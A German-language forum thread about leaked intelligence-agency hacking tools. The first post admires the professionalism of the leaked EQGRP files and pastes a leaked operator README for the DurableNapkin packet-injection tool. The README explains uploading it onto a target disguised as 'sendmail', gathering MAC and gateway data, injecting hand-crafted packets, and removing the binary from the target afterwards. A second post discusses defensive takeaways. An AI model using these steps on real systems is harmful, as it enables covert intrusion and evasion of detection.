Die Macht über das Internet gehört den Geheimdiensten

rat

Stammuser
Ich habe kmir neulich mal die bekannten Leaks angeschaut von den Tools die vom FBI oder war es NSA Server gestohlen wurden.Und ehrlich muss ich sagen wer die Geheimdienste unterschätzt lebt in einer Traumwelt.

Auf GitHub GitHub - atiger77/EQGRP-Free-Files: EQGRP-Free-Files here., sind einiege dieser Tools zu finden und mir ist dort einieges besonders aufgefallen.Allein schon wenn man sich die Readmes anschaut wird sehr schnell deutlich das bei den Geheimdiesnten Hochprofessionelle programmierer und IT Spezialisten arbeiten.

hier sieht man das sehr deutlich:Kein normaler User würde so eine Readme verfassen,das machen nur Menschen die sich in der IT sehr gut auskennen.Allein schon die # zu benutzt um einen Titel zu setzten und wenn man sich den Code zu den verschiedenen Programmen mal anschaut,das sind keine Anfänger.

Wenn ich mir das anschaue wird mir immer klarer das es leichtsinnig ist zu denken das die nichts aufm Kasten hätten,mir hat das ein stück die Augen geöffnet.

# No tunnel is needed for the Linux bin

so with one noclient:
-tunnel
l 9090 127.0.0.1 9090

and from another noclient:

-cd /tmp
-put /current/bin/FW/DurableNapkin/durablenapkin.solaris.2.0.1.1 sendmail -> put the tool up as "sendmail"
-ifconfig -> get the source mac for the PITCH
netstat -rn -> get the default gateway

# Solaris run this:
netstat -np |grep gatewayIP -> get the mac for the default gateway

# Linux run this
cat /proc/net/arp

# If the gateway in not in the table.. you can ping the gateway

# For solaris
-shell -> run this in a shell
S=08:00:20:8a:8d:48 D=00:0a:41:2d:8c:80 P=9090 I=hme0 ./sendmail

# (this command sets the src mac (S=) the dst mac (d=) the redir port (P=)
# and the interface (I=) and if you want continous running (C=) and in debug
# mode (d=) )

# Now you can throw THUD at using 9090 as the redir port and 127.0.0.1 for
# the redir listener.

# For Linux

-shell
./sendmail

# Here is where it gets interesting
# Valid commands are: SMAC, DMAC, INT, PACK, DONE, GO
# From the data you collected up at the top, you have fill in now

SMAC=SRC MAC
DMAC=DEST MAC
INT=INTERFACE
PACK=PACKET (Thats right, you have to copy & paste your packet in here)
DONE=Finished with the program (exit)
GO <#>=SEND PACKET(S)

# So as soon as you type ./sendmail you will see this:
SMAC=(undefined)
DMAC=(undefined)
INT=(undefined)
PACK=(undefined)

# Simply type in your data, line by line
SMAC=00:01:02:ce:7a:4f
DMAC=00:19:55:df:87:26
INT=eth0

# Now just press enter on a blank line to get the status
Current settings:
SMAC=00:01:02:ce:7a:4f
DMAC=00:19:55:df:87:26
INT=eth0
PACK=(undefined)

# So now you have to actually capture your packet using a sniffing program
# tcpdump was used in this instance
# tcpdump -s 1500 -x host <IP or hostname>
# Take your capture and type it in

PACK="4500 0054 0000 4000 4001 01de 7d0a 1f5c 7d0a 1f5b 0800 27fe 9
8346 24f2 0100 0809 0a0b 0c0d 0e0f 1011 1213 1415 1617 1819 1a1b 1
2223 2425 2627 2829 2a2b 2c2d 2e2f 3031 3233 3435 3637"

# Hit enter on blank line to get your settings
Current settings:
SMAC=00:01:02:ce:7a:4f
DMAC=00:19:55:df:87:26
INT=eth0
PACK="
45 00 00 54 00 00 40 00 40 01 01 de 7d 0a 1f 5c
7d 0a 1f 5b 08 00 27 fe 96 0e 00 00 a5 b7 83 46
24 f2 01 00 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13
14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23
24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33
34 35 36 37 "

# Now type GO to send 1 packet or type GO 25 to send 25 packets.. whatever

GO

# When finished completely

DONE

# Don't forget to remove your binary from target
 

TheGremlin

New member
Nun, dass die nicht am rumpimmeln sind, ist hier glaube ich allen klar. Ich habe mir die Tools nicht genau angescheut, aber diese Readme erinnert mich vom style her irgendwie an Cisco...(Coincidence? I think not :D )

Die Frage ist, was macht man jetzt mit dem Wissen darüber?
Klar, patchen was das Zeug hällt, starke encryption, etc, aber das sind ja alles bekannte Vorgehensweisen. Im Endeffekt sind wir (als User) genauso schlau wie vorher... allerdings mehr denn je auf Whistleblower angewiesen.
 
Oben